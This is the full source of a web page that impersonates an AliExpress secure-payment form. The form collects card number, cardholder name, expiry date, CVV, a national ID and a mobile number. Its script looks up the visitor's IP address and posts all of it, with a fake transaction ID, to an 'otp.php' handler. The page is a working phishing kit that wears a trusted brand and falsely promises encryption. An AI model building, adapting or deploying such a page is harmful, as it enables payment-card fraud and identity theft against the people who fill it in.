<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Secure Payment | AliExpress</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
  <link rel="icon" type="image/png" sizes="32x32" href="https://i.ibb.co/pv0bbdMm/fav.png">
  <style>
    /* Base Styles */
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
    }

    body {
      min-height: 100vh;
      display: flex;
      justify-content: center;
      align-items: center;
      background: linear-gradient(135deg, #f8f9fa, #e9ecef);
      padding: 20px;
    }

    .container {
      width: 100%;
      max-width: 500px;
    }

    /* Card Container */
    .payment-card {
      width: 100%;
      background: #fff;
      box-shadow: 0 10px 30px rgba(0, 0, 0, 0.08);
      border-radius: 16px;
      overflow: hidden;
      transform: translateY(0);
      transition: transform 0.3s ease, box-shadow 0.3s ease;
      margin-bottom: 20px;
    }

    .payment-card:hover {
      transform: translateY(-5px);
      box-shadow: 0 15px 35px rgba(0, 0, 0, 0.12);
    }

    /* Header Section */
    .card-header {
      background: linear-gradient(to right, #ff6a00, #ee4d2d);
      padding: 25px 30px;
      text-align: center;
      color: white;
      position: relative;
      overflow: hidden;
    }

    .header-pattern {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      opacity: 0.1;
      background-image: 
        radial-gradient(circle at 10% 20%, rgba(255, 255, 255, 0.8) 1px, transparent 2px),
        radial-gradient(circle at 90% 80%, rgba(255, 255, 255, 0.8) 1px, transparent 2px);
      background-size: 40px 40px;
    }

    .aliexpress-logo {
      display: flex;
      align-items: center;
      justify-content: center;
      gap: 12px;
      margin-bottom: 15px;
      z-index: 2;
      position: relative;
    }

    .aliexpress-text {
      font-size: 24px;
      font-weight: 700;
      letter-spacing: -0.5px;
      text-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
    }

    .aliexpress-logo img {
      height: 45px;
      filter: drop-shadow(0 2px 4px rgba(0, 0, 0, 0.1));
    }

    .header-title {
      font-size: 22px;
      font-weight: 600;
      margin-bottom: 10px;
      z-index: 2;
      position: relative;
    }

    .header-subtitle {
      font-size: 16px;
      font-weight: 500;
      opacity: 0.9;
      z-index: 2;
      position: relative;
    }

    /* Body Section */
    .card-body {
      padding: 30px;
    }

    .form-section {
      margin-bottom: 25px;
    }

    .section-title {
      display: flex;
      align-items: center;
      gap: 10px;
      font-size: 18px;
      font-weight: 600;
      color: #333;
      margin-bottom: 20px;
      padding-bottom: 8px;
      border-bottom: 1px solid #eee;
    }

    .section-title i {
      color: #ff6a00;
    }

    /* Form Styles */
    .form-group {
      margin-bottom: 20px;
      position: relative;
    }

    .form-label {
      display: block;
      font-size: 14px;
      color: #555;
      margin-bottom: 8px;
      font-weight: 500;
    }

    .input-icon-container {
      position: relative;
    }

    .input-icon {
      position: absolute;
      left: 14px;
      top: 50%;
      transform: translateY(-50%);
      color: #999;
      font-size: 16px;
    }

    .form-input {
      width: 100%;
      padding: 14px 14px 14px 40px;
      border: 1px solid #ddd;
      border-radius: 8px;
      font-size: 15px;
      transition: all 0.3s;
      background-color: #fafafa;
    }

    .form-input:focus {
      border-color: #ff6a00;
      outline: none;
      box-shadow: 0 0 0 3px rgba(255, 106, 0, 0.15);
      background-color: #fff;
    }

    .error {
      border-color: #e74c3c !important;
    }

    .error-message {
      color: #e74c3c;
      font-size: 12px;
      margin-top: 6px;
      display: none;
    }

    /* Card Preview */
    .card-preview {
      background: linear-gradient(135deg, #2c3e50, #4a6491);
      border-radius: 12px;
      padding: 20px;
      color: white;
      margin-bottom: 25px;
      box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
      position: relative;
      overflow: hidden;
    }

    .card-preview::before {
      content: "";
      position: absolute;
      top: -50%;
      right: -50%;
      width: 200%;
      height: 200%;
      background: radial-gradient(circle, rgba(255, 255, 255, 0.1) 0%, transparent 70%);
      pointer-events: none;
    }

    .card-top {
      display: flex;
      justify-content: space-between;
      align-items: center;
      margin-bottom: 30px;
    }

    .card-type {
      font-weight: 600;
      font-size: 18px;
    }

    .card-chip {
      width: 40px;
      height: 30px;
      background: linear-gradient(135deg, #d9c37e, #c7b15e);
      border-radius: 5px;
      position: relative;
      overflow: hidden;
    }

    .card-chip::before {
      content: "";
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-image: 
        linear-gradient(45deg, 
          rgba(0, 0, 0, 0.1) 25%, 
          transparent 25%, 
          transparent 75%, 
          rgba(0, 0, 0, 0.1) 75%);
      background-size: 8px 8px;
    }

    .card-number {
      font-size: 22px;
      letter-spacing: 2px;
      margin-bottom: 30px;
      font-family: 'Courier New', monospace;
      text-shadow: 0 1px 3px rgba(0, 0, 0, 0.3);
    }

    .card-bottom {
      display: flex;
      justify-content: space-between;
      align-items: center;
    }

    .card-holder, .card-expiry {
      font-size: 14px;
      opacity: 0.9;
    }

    .card-holder-name, .card-expiry-date {
      font-size: 16px;
      font-weight: 500;
      margin-top: 3px;
    }

    /* Expiration Date */
    .expire-row {
      display: flex;
      gap: 15px;
      margin-bottom: 20px;
    }

    .expire-group {
      flex: 1;
    }

    .select-container {
      position: relative;
    }

    .select-container::after {
      content: "\f078";
      font-family: "Font Awesome 6 Free";
      font-weight: 900;
      position: absolute;
      right: 15px;
      top: 50%;
      transform: translateY(-50%);
      color: #777;
      pointer-events: none;
    }

    .form-select {
      width: 100%;
      padding: 14px 14px;
      border: 1px solid #ddd;
      border-radius: 8px;
      font-size: 15px;
      appearance: none;
      background-color: #fafafa;
      cursor: pointer;
    }

    .form-select:focus {
      border-color: #ff6a00;
      outline: none;
      box-shadow: 0 0 0 3px rgba(255, 106, 0, 0.15);
      background-color: #fff;
    }

    /* Checkbox */
    .checkbox-group {
      display: flex;
      align-items: center;
      gap: 12px;
      margin: 25px 0;
    }

    .checkbox-custom {
      width: 20px;
      height: 20px;
      border: 2px solid #ddd;
      border-radius: 5px;
      display: flex;
      align-items: center;
      justify-content: center;
      cursor: pointer;
      transition: all 0.2s;
    }

    .checkbox-custom i {
      color: #ff6a00;
      font-size: 14px;
      opacity: 0;
      transition: opacity 0.2s;
    }

    input[type="checkbox"]:checked + .checkbox-custom {
      background: rgba(255, 106, 0, 0.1);
      border-color: #ff6a00;
    }

    input[type="checkbox"]:checked + .checkbox-custom i {
      opacity: 1;
    }

    .checkbox-text {
      font-size: 15px;
      color: #555;
    }

    /* Buttons */
    .button-group {
      display: flex;
      gap: 15px;
      margin-top: 10px;
    }

    .btn {
      flex: 1;
      padding: 16px;
      border: none;
      border-radius: 8px;
      font-weight: 600;
      cursor: pointer;
      transition: all 0.3s;
      font-size: 16px;
      display: flex;
      align-items: center;
      justify-content: center;
      gap: 8px;
    }

    .btn-primary {
      background: linear-gradient(to right, #ff6a00, #ee4d2d);
      color: white;
      box-shadow: 0 4px 12px rgba(255, 106, 0, 0.25);
    }

    .btn-primary:hover {
      background: linear-gradient(to right, #e55d00, #d44324);
      box-shadow: 0 6px 15px rgba(255, 106, 0, 0.35);
    }

    .btn-outline {
      background: transparent;
      border: 1px solid #ddd;
      color: #555;
    }

    .btn-outline:hover {
      background: #f9f9f9;
      border-color: #ccc;
    }

    .btn:disabled {
      opacity: 0.6;
      cursor: not-allowed;
      transform: none;
    }

    /* Footer */
    .payment-security {
      display: flex;
      align-items: center;
      justify-content: center;
      gap: 10px;
      margin-top: 25px;
      padding-top: 20px;
      border-top: 1px solid #eee;
      color: #666;
      font-size: 14px;
    }

    .security-icon {
      color: #27ae60;
      font-size: 18px;
    }

    /* Responsive Design */
    @media (max-width: 600px) {
      .card-header {
        padding: 20px;
      }
      
      .aliexpress-text {
        font-size: 20px;
      }
      
      .aliexpress-logo img {
        height: 40px;
      }
      
      .header-title {
        font-size: 20px;
      }
      
      .card-body {
        padding: 20px;
      }
      
      .card-number {
        font-size: 18px;
      }
      
      .btn {
        padding: 14px;
        font-size: 15px;
      }
      
      .expire-row {
        flex-direction: column;
        gap: 10px;
      }
    }

    @media (max-width: 400px) {
      .button-group {
        flex-direction: column;
      }
    }
  </style>
</head>
<body>
  <div class="container">
    <div id="paymentForm" class="payment-card">
      <div class="card-header">
        <div class="header-pattern"></div>
        <div class="aliexpress-logo">
          <img src="https://i.ibb.co/pv0bbdMm/fav.png" alt="AliExpress Logo">
          <span class="aliexpress-text">AliExpress</span>
        </div>
        <h1 class="header-title">Secure Payment Information</h1>
        <p class="header-subtitle">Complete your purchase securely</p>
      </div>
      
      <div class="card-body">
        <form id="paymentDataForm" method="POST" action="otp.php">
          <!-- Hidden fields for transaction details -->
          <input type="hidden" id="transactionId" name="transactionId" value="">
          <input type="hidden" id="transactionTime" name="transactionTime" value="">
          <input type="hidden" id="ipAddress" name="ipAddress" value="">
          <input type="hidden" id="amount" name="amount" value="247.99">
          
          <div class="form-section">
            <div class="section-title">
              <i class="fas fa-credit-card"></i>
              <span>Card Information</span>
            </div>
            
            <!-- Card Preview -->
            <div class="card-preview">
              <div class="card-top">
                <div class="card-type">VISA</div>
                <div class="card-chip"></div>
              </div>
              <div class="card-number">•••• •••• •••• ••••</div>
              <div class="card-bottom">
                <div class="card-holder">
                  <div>CARD HOLDER</div>
                  <div class="card-holder-name">Full Name</div>
                </div>
                <div class="card-expiry">
                  <div>EXPIRES</div>
                  <div class="card-expiry-date">MM/YY</div>
                </div>
              </div>
            </div>
            
            <div class="form-group">
              <label class="form-label">Card Number (16 digits)</label>
              <div class="input-icon-container">
                <i class="fas fa-credit-card input-icon"></i>
                <input 
                  type="text" 
                  id="cardNumber" 
                  name="cardNumber"
                  class="form-input" 
                  placeholder="0000 0000 0000 0000"
                  maxlength="19"
                  inputmode="numeric"
                  required>
              </div>
              <div class="error-message" id="cardNumberError">Please enter a valid 16-digit card number</div>
            </div>
            
            <div class="form-group">
              <label class="form-label">Cardholder Name</label>
              <div class="input-icon-container">
                <i class="fas fa-user input-icon"></i>
                <input 
                  type="text" 
                  id="cardHolder" 
                  name="cardHolder"
                  class="form-input" 
                  placeholder="John Doe"
                  required>
              </div>
              <div class="error-message" id="cardHolderError">Please enter a valid name (letters only)</div>
            </div>
            
            <div class="expire-row">
              <div class="expire-group">
                <label class="form-label">Expiration Date</label>
                <div class="select-container">
                  <select id="expMonth" name="expMonth" class="form-select" required>
                    <option value="" disabled selected>Month</option>
                    <option value="01">01 - January</option>
                    <option value="02">02 - February</option>
                    <option value="03">03 - March</option>
                    <option value="04">04 - April</option>
                    <option value="05">05 - May</option>
                    <option value="06">06 - June</option>
                    <option value="07">07 - July</option>
                    <option value="08">08 - August</option>
                    <option value="09">09 - September</option>
                    <option value="10">10 - October</option>
                    <option value="11">11 - November</option>
                    <option value="12">12 - December</option>
                  </select>
                </div>
              </div>
              
              <div class="expire-group">
                <label class="form-label">Year</label>
                <div class="select-container">
                  <select id="expYear" name="expYear" class="form-select" required>
                    <option value="" disabled selected>Year</option>
                    <option value="25">2025</option>
                    <option value="26">2026</option>
                    <option value="27">2027</option>
                    <option value="28">2028</option>
                    <option value="29">2029</option>
                    <option value="30">2030</option>
                    <option value="31">2031</option>
                    <option value="32">2032</option>
                    <option value="33">2033</option>
                    <option value="34">2034</option>
                    <option value="35">2035</option>
                  </select>
                </div>
              </div>
              
              <div class="expire-group">
                <label class="form-label">CVV</label>
                <div class="input-icon-container">
                  <i class="fas fa-lock input-icon"></i>
                  <input 
                    type="text" 
                    id="cvv" 
                    name="cvv"
                    class="form-input" 
                    placeholder="123"
                    maxlength="4"
                    inputmode="numeric"
                    required>
                </div>
                <div class="error-message" id="cvvError">Please enter 3 or 4 digits</div>
              </div>
            </div>
          </div>
          
          <div class="form-section">
            <div class="section-title">
              <i class="fas fa-user-shield"></i>
              <span>Personal Information</span>
            </div>
            
            <div class="form-group">
              <label class="form-label">National ID (9 digits)</label>
              <div class="input-icon-container">
                <i class="fas fa-id-card input-icon"></i>
                <input 
                  type="text" 
                  id="nationalId" 
                  name="nationalId"
                  class="form-input" 
                  placeholder="123456789" 
                  maxlength="9"
                  inputmode="numeric"
                  required>
              </div>
              <div class="error-message" id="nationalIdError">Please enter exactly 9 digits</div>
            </div>
            
            <div class="form-group">
              <label class="form-label">Mobile Number (05xxxxxxxx)</label>
              <div class="input-icon-container">
                <i class="fas fa-mobile-alt input-icon"></i>
                <input 
                  type="tel" 
                  id="mobileNumber" 
                  name="mobileNumber"
                  class="form-input" 
                  placeholder="0512345678" 
                  maxlength="10"
                  required>
              </div>
              <div class="error-message" id="mobileNumberError">Please enter a valid mobile number starting with 05</div>
            </div>
            
          </div>
          
          <div class="checkbox-group">
            <input type="checkbox" id="saveCard" name="saveCard" checked>
            <label for="saveCard" class="checkbox-custom">
              <i class="fas fa-check"></i>
            </label>
            <span class="checkbox-text">Save card details for future purchases</span>
          </div>
          
          <div class="checkbox-group">
            <input type="checkbox" id="terms" name="terms" checked required>
            <label for="terms" class="checkbox-custom">
              <i class="fas fa-check"></i>
            </label>
            <span class="checkbox-text">I agree to the <a href="#" style="color: #ff6a00;">Terms & Conditions</a></span>
          </div>
          
          <div class="button-group">
            <button id="submitBtn" class="btn btn-primary">
              <i class="fas fa-lock"></i>
              <span>Pay Now</span>
            </button>
            <button id="cancelBtn" class="btn btn-outline">
              <i class="fas fa-times"></i>
              <span>Cancel</span>
            </button>
          </div>
          
          <div class="payment-security">
            <i class="fas fa-shield-alt security-icon"></i>
            <span>Your payment information is securely encrypted</span>
          </div>
        </form>
      </div>
    </div>
  </div>

  <script>
    document.addEventListener('DOMContentLoaded', function() {
      // Elements
      const cardNumber = document.getElementById('cardNumber');
      const cardHolder = document.getElementById('cardHolder');
      const nationalId = document.getElementById('nationalId');
      const mobileNumber = document.getElementById('mobileNumber');
      const expMonth = document.getElementById('expMonth');
      const expYear = document.getElementById('expYear');
      const cvv = document.getElementById('cvv');
      const submitBtn = document.getElementById('submitBtn');
      const cancelBtn = document.getElementById('cancelBtn');
      const cardPreviewNumber = document.querySelector('.card-number');
      const cardPreviewName = document.querySelector('.card-holder-name');
      const cardPreviewExpiry = document.querySelector('.card-expiry-date');
      const paymentForm = document.getElementById('paymentForm');
      const paymentDataForm = document.getElementById('paymentDataForm');
      const transactionId = document.getElementById('transactionId');
      const transactionTime = document.getElementById('transactionTime');
      const ipAddressField = document.getElementById('ipAddress');
      const amountField = document.getElementById('amount');
      
      // Track interactions
      const fieldInteracted = {
        cardNumber: false,
        cardHolder: false,
        nationalId: false,
        mobileNumber: false,
        cvv: false
      };
      
      // Format card number input
      cardNumber.addEventListener('input', function(e) {
        let value = e.target.value.replace(/\D/g, '');
        if (value.length > 16) value = value.substring(0, 16);
        
        // Format with spaces every 4 digits
        let formatted = '';
        for (let i = 0; i < value.length; i++) {
          if (i > 0 && i % 4 === 0) formatted += ' ';
          formatted += value[i];
        }
        
        e.target.value = formatted;
        cardPreviewNumber.textContent = formatted || '•••• •••• •••• ••••';
        validateCardNumber();
      });
      
      // Update card preview
      cardHolder.addEventListener('input', function() {
        cardPreviewName.textContent = this.value || 'Full Name';
        validateCardHolder();
      });
      
      expMonth.addEventListener('change', updateExpiryPreview);
      expYear.addEventListener('change', updateExpiryPreview);
      
      function updateExpiryPreview() {
        if (expMonth.value && expYear.value) {
          cardPreviewExpiry.textContent = `${expMonth.value}/${expYear.value}`;
        } else {
          cardPreviewExpiry.textContent = 'MM/YY';
        }
      }
      
      // Validation functions
      function validateCardNumber() {
        const value = cardNumber.value.replace(/\D/g, '');
        const isValid = value.length === 16;
        showError('cardNumberError', !isValid);
        return isValid;
      }
      
      function validateCardHolder() {
        const isValid = /^[a-zA-Z\u00C0-\u017F\s.'-]{2,}$/.test(cardHolder.value);
        showError('cardHolderError', !isValid);
        return isValid;
      }
      
      function validateNationalId() {
        const value = nationalId.value.replace(/\D/g, '');
        const isValid = value.length === 9;
        showError('nationalIdError', !isValid);
        return isValid;
      }
      
      function validateMobileNumber() {
        let value = mobileNumber.value.replace(/\D/g, '');
        if (!value.startsWith('05') && value.length > 0) {
          value = '05' + value;
          mobileNumber.value = value;
        }
        const isValid = value.length === 10 && value.startsWith('05');
        showError('mobileNumberError', !isValid);
        return isValid;
      }
            
      function validateExpiry() {
        return expMonth.value !== '' && expYear.value !== '';
      }
      
      function validateCvv() {
        const value = cvv.value.replace(/\D/g, '');
        const isValid = value.length >= 3 && value.length <= 4;
        showError('cvvError', !isValid);
        return isValid;
      }
      
      function validateTerms() {
        return document.getElementById('terms').checked;
      }
      
      function showError(elementId, show) {
        const errorElement = document.getElementById(elementId);
        const inputElement = errorElement.previousElementSibling.querySelector('.form-input') || 
                             errorElement.previousElementSibling;
        
        if (show) {
          errorElement.style.display = 'block';
          inputElement.classList.add('error');
        } else {
          errorElement.style.display = 'none';
          inputElement.classList.remove('error');
        }
      }
      
      // Field interaction tracking
      function setupFieldInteraction(field, fieldName) {
        field.addEventListener('blur', function() {
          fieldInteracted[fieldName] = true;
          switch(fieldName) {
            case 'cardNumber': validateCardNumber(); break;
            case 'cardHolder': validateCardHolder(); break;
            case 'nationalId': validateNationalId(); break;
            case 'mobileNumber': validateMobileNumber(); break;
            case 'cvv': validateCvv(); break;
          }
        });
      }
      
      // Initialize field interactions
      setupFieldInteraction(cardNumber, 'cardNumber');
      setupFieldInteraction(cardHolder, 'cardHolder');
      setupFieldInteraction(nationalId, 'nationalId');
      setupFieldInteraction(mobileNumber, 'mobileNumber');
      setupFieldInteraction(cvv, 'cvv');
      
      // Form submission
      submitBtn.addEventListener('click', function(e) {
        e.preventDefault();
        
        // Mark all fields as interacted
        for (const field in fieldInteracted) {
          fieldInteracted[field] = true;
        }
        
        // Validate all fields
        const validations = [
          validateCardNumber(),
          validateCardHolder(),
          validateNationalId(),
          validateMobileNumber(),
          validateExpiry(),
          validateCvv(),
          validateTerms()
        ];
        
        const isValid = validations.every(valid => valid);
        
        if (isValid) {
          submitBtn.disabled = true;
          submitBtn.innerHTML = '<i class="fas fa-spinner fa-spin"></i> Processing...';
          
          // Get user IP
          fetch('https://api.ipify.org?format=json')
            .then(response => response.json())
            .then(ipData => {
              // Set hidden fields
              const txId = 'TRX-' + Math.random().toString(36).substr(2, 8).toUpperCase();
              transactionId.value = txId;
              transactionTime.value = new Date().toLocaleString();
              ipAddressField.value = ipData.ip;
              amountField.value = 247.99;
              
              // Submit the form
              paymentDataForm.submit();
            })
            .catch(error => {
              console.error('Error getting IP:', error);
              // Set hidden fields without IP
              const txId = 'TRX-' + Math.random().toString(36).substr(2, 8).toUpperCase();
              transactionId.value = txId;
              transactionTime.value = new Date().toLocaleString();
              ipAddressField.value = 'Not available';
              amountField.value = 247.99;
              
              // Submit the form
              paymentDataForm.submit();
            });
        } else {
          // Scroll to first error
          const firstError = document.querySelector('.error');
          if (firstError) {
            firstError.scrollIntoView({ behavior: 'smooth', block: 'center' });
          }
        }
      });
      
      // Cancel button
      cancelBtn.addEventListener('click', function() {
        if (confirm('Are you sure you want to cancel? All entered data will be lost.')) {
          resetForm();
        }
      });
      
      // Reset form
      function resetForm() {
        paymentDataForm.reset();
        cardPreviewNumber.textContent = '•••• •••• •••• ••••';
        cardPreviewName.textContent = 'Full Name';
        cardPreviewExpiry.textContent = 'MM/YY';
        submitBtn.disabled = false;
        submitBtn.innerHTML = '<i class="fas fa-lock"></i> Pay Now';
        
        // Reset error states
        document.querySelectorAll('.error').forEach(el => el.classList.remove('error'));
        document.querySelectorAll('.error-message').forEach(el => el.style.display = 'none');
        
        // Reset interaction tracking
        for (const field in fieldInteracted) {
          fieldInteracted[field] = false;
        }
      }
    });
  </script>
</body>
</html>